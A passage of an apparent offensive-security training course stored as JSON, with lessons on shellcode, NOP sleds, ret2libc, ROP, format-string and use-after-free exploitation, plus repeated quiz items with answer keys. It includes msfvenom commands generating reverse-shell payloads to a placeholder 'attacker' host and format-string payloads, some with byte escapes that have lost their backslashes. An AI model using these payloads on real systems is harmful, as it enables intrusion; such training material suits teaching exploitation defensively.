NOPs.","sections":[{"type":"text","content":"A NOP sled is a sequence of NOP instructions (0x90) before your shellcode. Any jump into the sled slides execution to the shellcode."},{"type":"code","lang":"bash","content":"# Payload structure:\n# [buffer padding] [JMP ESP address] [NOP sled] [shellcode]\nbuf = b'A' * offset\nbuf += p32(jmp_esp_addr)\nbuf += b'x90' * 32  # NOP sled\nbuf += shellcode"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"A NOP sled increases...","opts":["Speed","The chance of hitting shellcode by providing a landing zone","Security","Memory usage"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-shellcode-gen","cat":"Exploitation","title":"Shellcode Generation with msfvenom","diff":1,"xp":75,"intro":"Generate shellcode for use in custom exploits.","sections":[{"type":"text","content":"msfvenom generates shellcode in various formats: raw bytes, C array, Python, and more. Specify bad characters to exclude."},{"type":"code","lang":"bash","content":"# Linux x64 reverse shell shellcode\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -b 'x00' -f python\n# Windows x64\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -b 'x00x0ax0d' -f c\n# Raw bytes\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f raw > shellcode.bin"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"The -b flag in msfvenom...","opts":["Specifies the binary","Excludes bad characters from the generated shellcode","Sets the buffer size","Enables debugging"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-pwntools-basics","cat":"Exploitation","title":"Pwntools Framework","diff":2,"xp":150,"intro":"Python exploitation framework for CTFs and exploit development.","sections":[{"type":"text","content":"pwntools provides: process/remote connections, pack/unpack, cyclic patterns, ROP chain building, ELF parsing, and shellcraft."},{"type":"code","lang":"python","content":"from pwn import *\np = process('./vuln')  # or remote('target', 9999)\n# Send data\np.sendline(b'A' * 100)\n# Receive output\nprint(p.recvline())\n# Pack addresses\np.sendline(b'A' * offset + p64(address))\np.interactive()"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"pwntools is designed for...","opts":["Web testing","Binary exploitation and CTF challenges","Network scanning","Forensics"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-ret2libc2","cat":"Exploitation","title":"Return-to-libc Attack","diff":3,"xp":200,"intro":"Bypass NX by returning to libc functions.","sections":[{"type":"text","content":"When the stack is non-executable, return into system('/bin/sh') from libc. Chain: pop rdi gadget -> '/bin/sh' address -> system() address."},{"type":"code","lang":"python","content":"from pwn import *\nlibc = ELF('/lib/x86_64-linux-gnu/libc.so.6')\nsystem = libc.symbols['system']\nbin_sh = next(libc.search(b'/bin/sh'))\npayload = b'A' * offset + p64(pop_rdi) + p64(bin_sh) + p64(system)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"ret2libc bypasses...","opts":["ASLR","NX/DEP (non-executable stack)","Stack canaries","All protections"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-format-string2","cat":"Exploitation","title":"Format String Exploitation","diff":3,"xp":200,"intro":"Read and write memory through printf() vulnerabilities.","sections":[{"type":"text","content":"When printf(user_input) is called, %x leaks stack values, %s reads from stack addresses, and %n writes to memory."},{"type":"code","lang":"bash","content":"# Leak stack values\n./vuln 'AAAA.%08x.%08x.%08x.%08x'\n# Read from specific address\n./vuln $(python -c \"print 'x48x96x04x08' + '.%x' * 6 + '.%s'\")\n# Write with %n\n./vuln $(python -c \"print 'x48x96x04x08' + '%100x' + '%n'\")"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Format string %n does what?","opts":["Reads memory","Writes the number of bytes printed so far to a memory address","Prints newline","Formats a number"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-rop-basics","cat":"Exploitation","title":"ROP Chain Basics","diff":3,"xp":200,"intro":"Chain gadgets for code execution without injecting shellcode.","sections":[{"type":"text","content":"ROP uses short instruction sequences (gadgets) ending in 'ret' from the existing binary. Chain them to perform arbitrary operations."},{"type":"code","lang":"bash","content":"# Find gadgets\nROPgadget --binary vuln\nropper --file vuln --search 'pop rdi; ret'\n# Build chain: pop rdi; ret -> '/bin/sh' -> system()\npayload = b'A' * offset\npayload += p64(pop_rdi_ret)\npayload += p64(bin_sh_addr)\npayload += p64(system_addr)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"A ROP gadget is...","opts":["A Metasploit module","A short instruction sequence ending in 'ret'","A type of shellcode","A buffer overflow"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-integer-overflow2","cat":"Exploitation","title":"Integer Overflow Exploitation","diff":3,"xp":200,"intro":"Arithmetic overflow leads to undersized buffers and memory corruption.","sections":[{"type":"text","content":"When a size calculation overflows (wraps around to a small number), a small buffer is allocated but a large copy follows, causing heap overflow."},{"type":"code","lang":"c","content":"// size = count * sizeof(int)\n// If count = 0x40000001, size overflows to 4\nunsigned int size = count * 4;  // = 4 (overflowed!)\nchar *buf = malloc(size);      // 4 bytes\nmemcpy(buf, data, count * 4);  // copies 4GB!"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Integer overflow causes...","opts":["Faster computation","A small allocation followed by a large copy (buffer overflow)","Division by zero","Infinite loops"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-use-after-free2","cat":"Exploitation","title":"Use-After-Free Exploitation","diff":4,"xp":250,"intro":"Reclaim freed memory with controlled data to hijack execution.","sections":[{"type":"text","content":"After memory is freed, allocate an object of the same size. The freed pointer now points to your controlled data. If it had a function pointer, you control execution."},{"type":"code","lang":"c","content":"// 1. Object allocated and freed\nfree(victim_obj);  // freed but pointer still exists\n// 2. Reclaim with attacker data\nevil = malloc(sizeof(*victim_obj));\nmemcpy(evil, &fake_vtable, sizeof(*victim_obj));\n// 3. Use the dangling reference\nvictim_obj->callback();  // calls attacker's function"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"UAF is exploitable because...","opts":["Memory is zeroed","Freed memory can be reallocated with attacker-controlled data","Memory is encrypted","The pointer is removed"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack 